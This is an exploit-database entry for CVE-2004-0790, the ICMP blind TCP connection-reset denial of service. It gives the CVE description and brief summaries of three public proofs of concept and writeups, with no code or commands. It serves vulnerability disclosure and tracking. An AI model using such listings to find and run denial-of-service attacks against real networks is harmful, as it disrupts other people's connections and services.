CVE-2004-0790
TCP/IP ICMP Error Handling - Blind Connection Reset Denial of Service
Title source: manualExploitation Summary
EIP tracks 3 public exploits for CVE-2004-0790. PoCs published by houseofdabus, Fernando Gont.
AI-analyzed exploit summary This is a proof-of-concept exploit for CVE-2004-0790, demonstrating ICMP-based attacks against TCP connections. It allows an attacker to send crafted ICMP messages to reset TCP connections, slow down traffic, or consume system resources.
Description
Multiple TCP/IP and ICMP implementations allow remote attackers to cause a denial of service (reset TCP connections) via spoofed ICMP error messages, aka the "blind connection-reset attack." NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.
Exploits (3)
This is a proof-of-concept exploit for CVE-2004-0790, demonstrating ICMP-based attacks against TCP connections. It allows an attacker to send crafted ICMP messages to reset TCP connections, slow down traffic, or consume system resources.
This is a writeup describing multiple ICMP-based denial-of-service vulnerabilities (CVE-2004-0790, CVE-2004-0791, CVE-2004-1060) affecting various TCP/IP implementations. It explains blind connection-reset, ICMP Source Quench, and PMTUD attacks but does not include functional exploit code.
This exploit demonstrates a DoS vulnerability in Windows by crafting a malformed IP packet with an option size of 39, causing a crash due to an off-by-one error in IP option processing.